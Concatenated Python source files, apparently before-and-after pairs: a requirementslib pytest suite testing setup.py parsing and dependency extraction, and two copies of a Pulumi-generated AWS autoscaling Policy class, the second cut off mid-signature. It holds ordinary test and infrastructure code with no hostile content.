(setup_py_dir / "package_with_setup_from_dict_with_name/setup.py").as_posix()
)
assert parsed["install_requires"] == ["requests"]
| # -*- coding=utf-8 -*-
import os
import shutil
import pytest
import vistir
from requirementslib.models.requirements import Requirement
from requirementslib.models.setup_info import ast_parse_setup_py
@pytest.mark.skipif(os.name == "nt", reason="Building this is broken on windows")
@pytest.mark.parametrize(
"test_artifact",
[
{"name": "environ_config", "as_artifact": False},
{"name": "environ_config", "as_artifact": True},
],
indirect=True,
)
def test_local_req(test_artifact):
r = Requirement.from_line(test_artifact.as_posix())
assert r.name.replace("_", "-") == "environ-config"
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == ["attrs"]
@pytest.mark.parametrize(
"url_line, name, requires",
[
[
"https://github.com/requests/requests/archive/v2.20.1.zip",
"requests",
["urllib3", "chardet", "certifi", "idna"],
],
[
"https://github.com/dropbox/pyannotate/archive/v1.0.4.zip",
"pyannotate",
["six", "mypy-extensions", "typing"],
],
],
)
@pytest.mark.needs_internet
def test_remote_req(url_line, name, requires):
r = Requirement.from_line(url_line)
assert r.name == name
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == sorted(requires)
@pytest.mark.parametrize(
"url_line, name",
[
[
"https://github.com/matteius/test-project/archive/refs/tags/1.0.0.zip#egg=test_project&subdirectory=parent_folder/pep508-package",
"test_project",
],
],
)
@pytest.mark.needs_internet
def test_remote_source_in_subdirectory(url_line, name):
r = Requirement.from_line(url_line)
assert r.name == name
setup_dict = r.req.setup_info.as_dict()
print(setup_dict)
assert setup_dict.get("name") == "pep508_package"
assert setup_dict.get("version") == "1.0.0"
assert sorted(list(setup_dict.get("requires").keys())) == sorted(
["sibling-package", "six"]
)
def test_no_duplicate_egg_info():
"""When the package has 'src' directory, do not write egg-info in base
dir."""
base_dir = vistir.compat.Path(os.path.abspath(os.getcwd())).as_posix()
r = Requirement.from_line("-e {}".format(base_dir))
egg_info_name = "{}.egg-info".format(r.name.replace("-", "_"))
distinfo_name = "{0}.dist-info".format(r.name.replace("-", "_"))
def find_metadata(path):
metadata_names = [
os.path.join(path, name) for name in (egg_info_name, distinfo_name)
]
if not os.path.isdir(path):
return None
pth = next(iter(pth for pth in metadata_names if os.path.isdir(pth)), None)
if not pth:
pth = next(
iter(
pth
for pth in os.listdir(path)
if any(
pth.endswith(md_ending)
for md_ending in [".egg-info", ".dist-info", ".whl"]
)
),
None,
)
return pth
assert not find_metadata(base_dir)
assert not find_metadata(os.path.join(base_dir, "src", "reqlib-metadata"))
assert r.req.setup_info and os.path.isdir(r.req.setup_info.egg_base)
setup_info = r.req.setup_info
setup_info.get_info()
assert (
find_metadata(setup_info.egg_base)
or find_metadata(setup_info.extra_kwargs["build_dir"])
or setup_info.get_egg_metadata()
)
@pytest.mark.needs_internet
def test_without_extras(pathlib_tmpdir):
"""Tests a setup.py or setup.cfg parse when extras returns None for some
files."""
setup_dir = pathlib_tmpdir.joinpath("sanitized-package")
setup_dir.mkdir()
assert setup_dir.is_dir()
setup_py = setup_dir.joinpath("setup.py")
setup_py.write_text(
"""
# -*- coding: utf-8 -*-
from setuptools import setup
setup(
name="sanitized-package",
version="0.0.1",
install_requires=["raven==5.32.0"],
extras_require={
'PDF': ["socks"]
}
)
""".strip()
)
setup_dict = None
with vistir.contextmanagers.cd(setup_dir.as_posix()):
pipfile_entry = {
"path": os.path.abspath(os.curdir),
"editable": True,
"extras": ["socks"],
}
r = Requirement.from_pipfile("e1839a8", pipfile_entry)
r.run_requires()
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == ["raven"]
@pytest.mark.parametrize(
"setup_py_name, extras, dependencies",
[
(
"package_with_multiple_extras",
["testing", "dev"],
["coverage", "flaky", "invoke", "parver", "six", "vistir", "wheel"],
),
("package_with_one_extra", ["testing"], ["coverage", "flaky", "six"]),
],
)
def test_extras(pathlib_tmpdir, setup_py_dir, setup_py_name, extras, dependencies):
"""Test named extras as a dependency."""
setup_dir = pathlib_tmpdir.joinpath("test_package")
shutil.copytree(setup_py_dir.joinpath(setup_py_name).as_posix(), setup_dir.as_posix())
assert setup_dir.is_dir()
pipfile_entry = {
"path": "./{0}".format(setup_dir.name),
"extras": extras,
"editable": True,
}
setup_dict = None
with vistir.contextmanagers.cd(pathlib_tmpdir.as_posix()):
r = Requirement.from_pipfile("test-package", pipfile_entry)
assert r.name == "test-package"
r.req.setup_info.get_info()
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == dependencies
def test_ast_parser_finds_variables(setup_py_dir):
target = setup_py_dir.joinpath("package_with_extras_as_variable/setup.py").as_posix()
parsed = ast_parse_setup_py(target)
expected = {
"name": "test_package",
"version": "1.0.0",
"install_requires": ["six"],
"extras_require": {"testing": ["coverage", "flaky"]},
}
for k, v in expected.items():
assert k in parsed
if isinstance(v, bool):
assert str(parsed[k]) == str(v), parsed[k]
else:
assert parsed[k] == v, parsed[k]
def test_ast_parser_finds_fully_qualified_setup(setup_py_dir):
target = setup_py_dir.joinpath(
"package_using_fully_qualified_setuptools/setup.py"
).as_posix()
parsed = ast_parse_setup_py(target)
expected = {
"name": "test_package",
"version": "1.0.0",
"install_requires": ["six"],
"extras_require": {"testing": ["coverage", "flaky"]},
}
for k, v in expected.items():
assert k in parsed
if isinstance(v, bool):
assert str(parsed[k]) == str(v), parsed[k]
else:
assert parsed[k] == v, parsed[k]
def test_ast_parser_handles_binops(setup_py_dir):
target = setup_py_dir.joinpath(
"package_with_conditional_install_requires/setup.py"
).as_posix()
parsed = ast_parse_setup_py(target)
expected = [
"azure-common>=1.1.5",
"cryptography",
"python-dateutil",
"requests",
]
assert list(sorted(parsed["install_requires"])) == list(sorted(expected))
def test_ast_parser_handles_binops_alternate(setup_py_dir):
target = setup_py_dir.joinpath("package_with_setup_from_dict/setup.py").as_posix()
parsed = ast_parse_setup_py(target)
assert parsed["name"] == "test package"
assert parsed["version"] == "1.0.0"
expected = [
"pytest",
"flake8",
]
assert list(sorted(parsed["extras_require"]["tests"])) == list(sorted(expected))
def test_parse_function_call_as_name(setup_py_dir, pathlib_tmpdir):
package_dir = pathlib_tmpdir.joinpath("package_with_function_call_as_name").as_posix()
setup_dir = setup_py_dir.joinpath("package_with_function_call_as_name").as_posix()
shutil.copytree(setup_dir, package_dir)
req = Requirement.from_line("-e {}".format(package_dir))
assert req.name == "package-with-function-call-as-name"
def test_ast_parser_handles_repeated_assignments(setup_py_dir):
target = (
setup_py_dir.joinpath("package_with_repeated_assignments").absolute().as_posix()
)
r = Requirement.from_line(target)
setup_dict = r.req.setup_info.as_dict()
assert setup_dict["name"] == "test-package-with-repeated-assignments"
assert sorted(setup_dict["requires"]) == ["six"]
def test_ast_parser_handles_exceptions(artifact_dir):
path = artifact_dir.joinpath("git/pyinstaller")
r = Requirement.from_line(path.as_posix())
setup_dict = r.req.setup_info.as_dict()
assert "altgraph" in setup_dict["requires"]
def test_ast_parser_handles_annoted_assignments(setup_py_dir):
parsed = ast_parse_setup_py(
setup_py_dir.joinpath("package_with_annoted_assignments/setup.py").as_posix()
)
assert parsed["extras_require"] == {"docs": ["sphinx", "sphinx-argparse"]}
def test_read_requirements_with_list_comp(setup_py_dir):
req = Requirement.from_line(
f"-e {(setup_py_dir / 'package_with_setup_with_list_comp').as_posix()}"
)
setup_info = req.req.setup_info.as_dict()
assert sorted(setup_info["requires"]) == ["requests"]
def test_ast_parse_from_dict_with_name(setup_py_dir):
parsed = ast_parse_setup_py(
(setup_py_dir / "package_with_setup_from_dict_with_name/setup.py").as_posix()
)
assert parsed["install_requires"] == ["requests"]
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['Policy']
class Policy(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
scalable_dimension: Optional[pulumi.Input[str]] = None,
service_namespace: Optional[pulumi.Input[str]] = None,
step_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']]] = None,
target_tracking_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides an Application AutoScaling Policy resource.
## Example Usage
### DynamoDB Table Autoscaling
```python
import pulumi
import pulumi_aws as aws
dynamodb_table_read_target = aws.appautoscaling.Target("dynamodbTableReadTarget",
max_capacity=100,
min_capacity=5,
resource_id="table/tableName",
scalable_dimension="dynamodb:table:ReadCapacityUnits",
service_namespace="dynamodb")
dynamodb_table_read_policy = aws.appautoscaling.Policy("dynamodbTableReadPolicy",
policy_type="TargetTrackingScaling",
resource_id=dynamodb_table_read_target.resource_id,
scalable_dimension=dynamodb_table_read_target.scalable_dimension,
service_namespace=dynamodb_table_read_target.service_namespace,
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="DynamoDBReadCapacityUtilization",
),
target_value=70,
))
```
### ECS Service Autoscaling
```python
import pulumi
import pulumi_aws as aws
ecs_target = aws.appautoscaling.Target("ecsTarget",
max_capacity=4,
min_capacity=1,
resource_id="service/clusterName/serviceName",
scalable_dimension="ecs:service:DesiredCount",
service_namespace="ecs")
ecs_policy = aws.appautoscaling.Policy("ecsPolicy",
policy_type="StepScaling",
resource_id=ecs_target.resource_id,
scalable_dimension=ecs_target.scalable_dimension,
service_namespace=ecs_target.service_namespace,
step_scaling_policy_configuration=aws.appautoscaling.PolicyStepScalingPolicyConfigurationArgs(
adjustment_type="ChangeInCapacity",
cooldown=60,
metric_aggregation_type="Maximum",
step_adjustments=[{
"metricIntervalUpperBound": 0,
"scaling_adjustment": -1,
}],
))
```
### Preserve desired count when updating an autoscaled ECS Service
```python
import pulumi
import pulumi_aws as aws
ecs_service = aws.ecs.Service("ecsService",
cluster="clusterName",
task_definition="taskDefinitionFamily:1",
desired_count=2)
```
### Aurora Read Replica Autoscaling
```python
import pulumi
import pulumi_aws as aws
replicas_target = aws.appautoscaling.Target("replicasTarget",
service_namespace="rds",
scalable_dimension="rds:cluster:ReadReplicaCount",
resource_id=f"cluster:{aws_rds_cluster["example"]["id"]}",
min_capacity=1,
max_capacity=15)
replicas_policy = aws.appautoscaling.Policy("replicasPolicy",
service_namespace=replicas_target.service_namespace,
scalable_dimension=replicas_target.scalable_dimension,
resource_id=replicas_target.resource_id,
policy_type="TargetTrackingScaling",
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="RDSReaderAverageCPUUtilization",
),
target_value=75,
scale_in_cooldown=300,
scale_out_cooldown=300,
))
```
### MSK / Kafka Autoscaling
```python
import pulumi
import pulumi_aws as aws
msk_target = aws.appautoscaling.Target("mskTarget",
service_namespace="kafka",
scalable_dimension="kafka:broker-storage:VolumeSize",
resource_id=aws_msk_cluster["example"]["arn"],
min_capacity=1,
max_capacity=8)
targets = aws.appautoscaling.Policy("targets",
service_namespace=msk_target.service_namespace,
scalable_dimension=msk_target.scalable_dimension,
resource_id=msk_target.resource_id,
policy_type="TargetTrackingScaling",
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="KafkaBrokerStorageUtilization",
),
target_value=55,
))
```
## Import
Application AutoScaling Policy can be imported using the `service-namespace` , `resource-id`, `scalable-dimension` and `policy-name` separated by `/`.
```sh
$ pulumi import aws:appautoscaling/policy:Policy test-policy service-namespace/resource-id/scalable-dimension/policy-name
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: The name of the policy. Must be between 1 and 255 characters in length.
:param pulumi.Input[str] policy_type: The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
:param pulumi.Input[str] resource_id: The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] scalable_dimension: The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] service_namespace: The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']] step_scaling_policy_configuration: Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
:param pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']] target_tracking_scaling_policy_configuration: A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['name'] = name
__props__['policy_type'] = policy_type
if resource_id is None and not opts.urn:
raise TypeError("Missing required property 'resource_id'")
__props__['resource_id'] = resource_id
if scalable_dimension is None and not opts.urn:
raise TypeError("Missing required property 'scalable_dimension'")
__props__['scalable_dimension'] = scalable_dimension
if service_namespace is None and not opts.urn:
raise TypeError("Missing required property 'service_namespace'")
__props__['service_namespace'] = service_namespace
__props__['step_scaling_policy_configuration'] = step_scaling_policy_configuration
__props__['target_tracking_scaling_policy_configuration'] = target_tracking_scaling_policy_configuration
__props__['arn'] = None
super(Policy, __self__).__init__(
'aws:appautoscaling/policy:Policy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
scalable_dimension: Optional[pulumi.Input[str]] = None,
service_namespace: Optional[pulumi.Input[str]] = None,
step_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']]] = None,
target_tracking_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']]] = None) -> 'Policy':
"""
Get an existing Policy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The ARN assigned by AWS to the scaling policy.
:param pulumi.Input[str] name: The name of the policy. Must be between 1 and 255 characters in length.
:param pulumi.Input[str] policy_type: The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
:param pulumi.Input[str] resource_id: The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] scalable_dimension: The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] service_namespace: The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']] step_scaling_policy_configuration: Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
:param pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']] target_tracking_scaling_policy_configuration: A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["name"] = name
__props__["policy_type"] = policy_type
__props__["resource_id"] = resource_id
__props__["scalable_dimension"] = scalable_dimension
__props__["service_namespace"] = service_namespace
__props__["step_scaling_policy_configuration"] = step_scaling_policy_configuration
__props__["target_tracking_scaling_policy_configuration"] = target_tracking_scaling_policy_configuration
return Policy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The ARN assigned by AWS to the scaling policy.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the policy. Must be between 1 and 255 characters in length.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> pulumi.Output[Optional[str]]:
"""
The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
"""
return pulumi.get(self, "policy_type")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Output[str]:
"""
The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="scalableDimension")
def scalable_dimension(self) -> pulumi.Output[str]:
"""
The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "scalable_dimension")
@property
@pulumi.getter(name="serviceNamespace")
def service_namespace(self) -> pulumi.Output[str]:
"""
The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "service_namespace")
@property
@pulumi.getter(name="stepScalingPolicyConfiguration")
def step_scaling_policy_configuration(self) -> pulumi.Output[Optional['outputs.PolicyStepScalingPolicyConfiguration']]:
"""
Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
"""
return pulumi.get(self, "step_scaling_policy_configuration")
@property
@pulumi.getter(name="targetTrackingScalingPolicyConfiguration")
def target_tracking_scaling_policy_configuration(self) -> pulumi.Output[Optional['outputs.PolicyTargetTrackingScalingPolicyConfiguration']]:
"""
A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
return pulumi.get(self, "target_tracking_scaling_policy_configuration")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['Policy']
class Policy(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
scalable_dimension: Optional[pulumi.Input[str]] = None,
service_namespace: Optional[pulumi.Input[str]] = None,
step_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']]] = None,
target_tracking_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides an Application AutoScaling Policy resource.
## Example Usage
### DynamoDB Table Autoscaling
```python
import pulumi
import pulumi_aws as aws
dynamodb_table_read_target = aws.appautoscaling.Target("dynamodbTableReadTarget",
max_capacity=100,
min_capacity=5,
resource_id="table/tableName",
scalable_dimension="dynamodb:table:ReadCapacityUnits",
service_namespace="dynamodb")
dynamodb_table_read_policy = aws.appautoscaling.Policy("dynamodbTableReadPolicy",
policy_type="TargetTrackingScaling",
resource_id=dynamodb_table_read_target.resource_id,
scalable_dimension=dynamodb_table_read_target.scalable_dimension,
service_namespace=dynamodb_table_read_target.service_namespace,
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="DynamoDBReadCapacityUtilization",
),
target_value=70,
))
```
### ECS Service Autoscaling
```python
import pulumi
import pulumi_aws as aws
ecs_target = aws.appautoscaling.Target("ecsTarget",
max_capacity=4,
min_capacity=1,
resource_id="service/clusterName/serviceName",
scalable_dimension="ecs:service:DesiredCount",
service_namespace="ecs")
ecs_policy = aws.appautoscaling.Policy("ecsPolicy",
policy_type="StepScaling",
resource_id=ecs_target.resource_id,
scalable_dimension=ecs_target.scalable_dimension,
service_namespace=ecs_target.service_namespace,
step_scaling_policy_configuration=aws.appautoscaling.PolicyStepScalingPolicyConfigurationArgs(
adjustment_type="ChangeInCapacity",
cooldown=60,
metric_aggregation_type="Maximum",
step_adjustments=[{
"metricIntervalUpperBound": 0,
"scaling_adjustment": -1,
}],
))
```
### Preserve desired count when updating an autoscaled ECS Service
```python
import pulumi
import pulumi_aws as aws
ecs_service = aws.ecs.Service("ecsService",
cluster="clusterName",
task_definition="taskDefinitionFamily:1",
desired_count=2)
```
### Aurora Read Replica Autoscaling
```python
import pulumi
import pulumi_aws as aws
replicas_target = aws.appautoscaling.Target("replicasTarget",
service_namespace="rds",
scalable_dimension="rds:cluster:ReadReplicaCount",
resource_id=f"cluster:{aws_rds_cluster['example']['id']}",
min_capacity=1,
max_capacity=15)
replicas_policy = aws.appautoscaling.Policy("replicasPolicy",
service_namespace=replicas_target.service_namespace,
scalable_dimension=replicas_target.scalable_dimension,
resource_id=replicas_target.resource_id,
policy_type="TargetTrackingScaling",
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="RDSReaderAverageCPUUtilization",
),
target_value=75,
scale_in_cooldown=300,
scale_out_cooldown=300,
))
```
### MSK / Kafka Autoscaling
```python
import pulumi
import pulumi_aws as aws
msk_target = aws.appautoscaling.Target("mskTarget",
service_namespace="kafka",
scalable_dimension="kafka:broker-storage:VolumeSize",
resource_id=aws_msk_cluster["example"]["arn"],
min_capacity=1,
max_capacity=8)
targets = aws.appautoscaling.Policy("targets",
service_namespace=msk_target.service_namespace,
scalable_dimension=msk_target.scalable_dimension,
resource_id=msk_target.resource_id,
policy_type="TargetTrackingScaling",
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="KafkaBrokerStorageUtilization",
),
target_value=55,
))
```
## Import
Application AutoScaling Policy can be imported using the `service-namespace` , `resource-id`, `scalable-dimension` and `policy-name` separated by `/`.
```sh
$ pulumi import aws:appautoscaling/policy:Policy test-policy service-namespace/resource-id/scalable-dimension/policy-name
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: The name of the policy. Must be between 1 and 255 characters in length.
:param pulumi.Input[str] policy_type: The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
:param pulumi.Input[str] resource_id: The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] scalable_dimension: The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] service_namespace: The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']] step_scaling_policy_configuration: Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
:param pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']] target_tracking_scaling_policy_configuration: A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['name'] = name
__props__['policy_type'] = policy_type
if resource_id is None and not opts.urn:
raise TypeError("Missing required property 'resource_id'")
__props__['resource_id'] = resource_id
if scalable_dimension is None and not opts.urn:
raise TypeError("Missing required property 'scalable_dimension'")
__props__['scalable_dimension'] = scalable_dimension
if service_namespace is None and not opts.urn:
raise TypeError("Missing required property 'service_namespace'")
__props__['service_namespace'] = service_namespace
__props__['step_scaling_policy_configuration'] = step_scaling_policy_configuration
__props__['target_tracking_scaling_policy_configuration'] = target_tracking_scaling_policy_configuration
__props__['arn'] = None
super(Policy, __self__).__init__(
'aws:appautoscaling/policy:Policy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
scalable_dimension: Optional[pulumi.Input[str]] = None,
service_namespace: Optional[pulumi.Input[str]] = None,
step_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']]] = None,
